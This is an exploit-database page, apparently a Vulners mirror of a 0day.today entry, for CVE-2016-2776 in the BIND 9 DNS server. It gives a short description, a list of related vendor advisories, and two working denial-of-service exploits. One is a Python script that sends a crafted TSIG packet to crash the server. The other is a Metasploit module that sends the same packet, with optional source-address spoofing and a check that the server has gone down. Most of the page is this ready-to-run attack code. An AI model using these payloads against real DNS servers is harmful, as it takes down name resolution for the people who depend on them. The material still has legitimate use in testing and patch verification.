Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Bind 9 DNS Server - Denial of Service Exploit

🗓️ 04 Oct 2016 00:00:00Reported by InfobyteType 
zdt
 zdt🔗 0day.today👁 278 Views

Denial of Service Bind 9 DNS Server CVE-2016-2776. A critical error condition can occur when a nameserver is constructing a response. The defect in rendering messages into packets can cause named to exit with an assertion failure in buffer.c while constructing a response to a query that meets certain criteria. This assertion can be triggered even if the apparent source address isn't allowed to make queries

Related
Code
ReporterTitlePublishedViews
Family
ALT Linux		Security fix for the ALT Linux 6 package bind version 9.3.6-alt7.M60P.2
4 Oct 201600:00
altlinux
ALT Linux		Security fix for the ALT Linux 6 package bind version 9.3.6-alt7.M60P.3
26 Oct 201600:00
altlinux
ALT Linux		Security fix for the ALT Linux 9 package bind version 9.9.8-alt4
27 Sep 201600:00
altlinux
ALT Linux		Security fix for the ALT Linux 7 package bind version 9.9.8-alt2.M70P.2
27 Sep 201600:00
altlinux
ALT Linux		Security fix for the ALT Linux 8 package bind version 9.9.8-alt4
27 Sep 201600:00
altlinux
IBM Security Bulletins		Security Bulletin: IBM i is affected by networking BIND vulnerabilities (CVE-2016-2775, CVE-2016-2776, CVE-2016-8864 and CVE-2016-6170)
18 Dec 201914:26
ibm
IBM Security Bulletins		Security Bulletin: Vulnerabilities in bind affect PowerKVM (CVE-2016-2776, CVE-2016-8864)
18 Jun 201801:33
ibm
IBM Security Bulletins		Security Bulletin: Multiple vulnerabilities in BIND affects IBM Netezza Host Management
18 Oct 201903:10
ibm
Tenable Nessus		ISC BIND 9.x < 9.9.9-P3 / 9.9.9-S5 / 9.10.4-P3 / 9.11.0-P1 DoS
20 Jan 201700:00
nessus
Tenable Nessus		AIX bind Advisory : bind_advisory13.asc (IV89828) (IV89829) (IV89830) (IV89831) (IV90056)
3 Aug 201700:00
nessus
Rows per page
import socket
import struct
 
TARGET = ('192.168.200.10', 53)
 
Q_A = 1
Q_TSIG = 250
DNS_MESSAGE_HEADERLEN = 12
 
 
def build_bind_nuke(question="\x06google\x03com\x00", udpsize=512):
    query_A = "\x8f\x65\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01" + question + int16(Q_A) + "\x00\x01"
 
    sweet_spot = udpsize - DNS_MESSAGE_HEADERLEN + 1
    tsig_rr = build_tsig_rr(sweet_spot)
 
    return query_A + tsig_rr
 
def int16(n):
    return struct.pack("!H", n)
 
def build_tsig_rr(bind_demarshalled_size):
    signature_data = ("\x00\x00\x57\xeb\x80\x14\x01\x2c\x00\x10\xd2\x2b\x32\x13\xb0\x09"
                      "\x46\x34\x21\x39\x58\x62\xf3\xd5\x9c\x8b\x8f\x65\x00\x00\x00\x00")
    tsig_rr_extra_fields = "\x00\xff\x00\x00\x00\x00"
 
    necessary_bytes  = len(signature_data) + len(tsig_rr_extra_fields)
    necessary_bytes += 2 + 2 # length fields
 
    # from sizeof(TSIG RR) bytes conforming the TSIG RR
    # bind9 uses sizeof(TSIG RR) - 16 to build its own
    sign_name, algo_name = generate_padding(bind_demarshalled_size - necessary_bytes + 16)
 
    tsig_hdr = sign_name + int16(Q_TSIG) + tsig_rr_extra_fields
    tsig_data = algo_name + signature_data
    return tsig_hdr + int16(len(tsig_data)) + tsig_data
 
def generate_padding(n):
    max_per_bucket = [0x3f, 0x3f, 0x3f, 0x3d, 0x3f, 0x3f, 0x3f, 0x3d]
    buckets = [1] * len(max_per_bucket)
 
    min_size = len(buckets) * 2 + 2 # 2 bytes for every bucket plus each null byte
    max_size = sum(max_per_bucket) + len(buckets) + 2
 
    if not(min_size <= n <= max_size):
        raise RuntimeException("unsupported amount of bytes")
 
    curr_idx, n = 0, n - min_size
    while n > 0:
        next_n = max(n - (max_per_bucket[curr_idx] - 1), 0)
        buckets[curr_idx] = 1 + n - next_n
        n, curr_idx = next_n, curr_idx + 1
 
    n_padding = lambda amount: chr(amount) + "A" * amount
    stringify = lambda sizes: "".join(map(n_padding, sizes)) + "\x00"
 
    return stringify(buckets[:4]), stringify(buckets[4:])
 
if __name__ == "__main__":
    bombita = build_bind_nuke()
 
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.sendto(bombita, TARGET)
    s.close()
 
'''
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
require 'timeout'
require 'socket'
 
class MetasploitModule < Msf::Auxiliary
 
  include Msf::Exploit::Capture
  include Msf::Auxiliary::UDPScanner
  include Msf::Auxiliary::Dos
  include Msf::Auxiliary::Report
 
  def initialize(info={})
    super(update_info(info,
      'Name'        => 'BIND 9 DoS CVE-2016-2776',
      'Description' => %q{
          Denial of Service Bind 9 DNS Server CVE-2016-2776.
          Critical error condition which can occur when a nameserver is constructing a response.
          A defect in the rendering of messages into packets can cause named to exit with an
          assertion failure in buffer.c while constructing a response to a query that meets certain criteria.
 
          This assertion can be triggered even if the apparent source address isnt allowed
          to make queries.
      },
      # Research and Original PoC - msf module author
      'Author'      => [ 'Martin Rocha', 'Ezequiel Tavella', 'Alejandro Parodi', 'Infobyte Research Team'],
      'License'     => MSF_LICENSE,
      'References'      =>
        [
          [ 'CVE', '2016-2776' ],
          [ 'URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html' ]
        ],
      'DisclosureDate' => 'Sep 27 2016',
      'DefaultOptions' => {'ScannerRecvWindow' => 0}
    ))
 
    register_options([
      Opt::RPORT(53),
      OptAddress.new('SRC_ADDR', [false, 'Source address to spoof'])
    ])
 
    deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')
  end
 
  def check_server_status(ip, rport)
    res = ""
    sudp = UDPSocket.new
    sudp.send(valid_query, 0, ip, rport)
    begin
      Timeout.timeout(5) do
      res = sudp.recv(100)
    end
    rescue Timeout::Error
    end
 
    if(res.length==0)
      print_good("Exploit Success (Maybe, nameserver did not replied)")
      else
        print_error("Exploit Failed")
    end
  end
 
  def scan_host(ip)
    @flag_success = true
    print_status("Sending bombita (Specially crafted udp packet) to: "+ip)
    scanner_send(payload, ip, rport)
    check_server_status(ip, rport)
  end
 
  def get_domain
    domain = "\x06"+Rex::Text.rand_text_alphanumeric(6)
    org = "\x03"+Rex::Text.rand_text_alphanumeric(3)
    get_domain = domain+org
  end
 
  def payload
    query = Rex::Text.rand_text_alphanumeric(2)  # Transaction ID: 0x8f65
    query += "\x00\x00"  # Flags: 0x0000 Standard query
    query += "\x00\x01"  # Questions: 1
    query += "\x00\x00"  # Answer RRs: 0
    query += "\x00\x00"  # Authority RRs: 0
    query += "\x00\x01"  # Additional RRs: 1
 
    # Doman Name
    query += get_domain   # Random DNS Name
    query += "\x00"      # [End of name]
    query += "\x00\x01"  # Type: A (Host Address) (1)
    query += "\x00\x01"  # Class: IN (0x0001)
 
    # Aditional records. Name
    query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes
    query += "\x3d"+Rex::Text.rand_text_alphanumeric(61)
    query += "\x00"
 
    query += "\x00\xfa" # Type: TSIG (Transaction Signature) (250)
    query += "\x00\xff" # Class: ANY (0x00ff)
    query += "\x00\x00\x00\x00" # Time to live: 0
    query += "\x00\xfc" # Data length: 252
 
    # Algorithm Name
    query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #Random 192 bytes
    query += "\x1A"+Rex::Text.rand_text_alphanumeric(26) #Random 26 bytes
    query += "\x00"
 
    # Rest of TSIG
    query += "\x00\x00"+Rex::Text.rand_text_alphanumeric(4) # Time Signed: Jan  1, 1970 03:15:07.000000000 ART
    query += "\x01\x2c" # Fudge: 300
    query += "\x00\x10" # MAC Size: 16
    query +=  Rex::Text.rand_text_alphanumeric(16) # MAC
    query += "\x8f\x65" # Original Id: 36709
    query += "\x00\x00" # Error: No error (0)
    query += "\x00\x00" # Other len: 0
  end
 
  def valid_query
    query = Rex::Text.rand_text_alphanumeric(2)  # Transaction ID: 0x8f65
    query += "\x00\x00"  # Flags: 0x0000 Standard query
    query += "\x00\x01"  # Questions: 1
    query += "\x00\x00"  # Answer RRs: 0
    query += "\x00\x00"  # Authority RRs: 0
    query += "\x00\x00"  # Additional RRs: 0
 
    # Doman Name
    query += get_domain   # Random DNS Name
    query += "\x00"      # [End of name]
    query += "\x00\x01"  # Type: A (Host Address) (1)
    query += "\x00\x01"  # Class: IN (0x0001)s
  end
 
end
'''

#  0day.today [2018-01-01]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Oct 2016 00:00Current
EPSS0.8745
bind 9denial of servicedns servercritical errorresponseassertion failurebuffer.ccriteriasource addresscve-2016-2776infobyte research team
278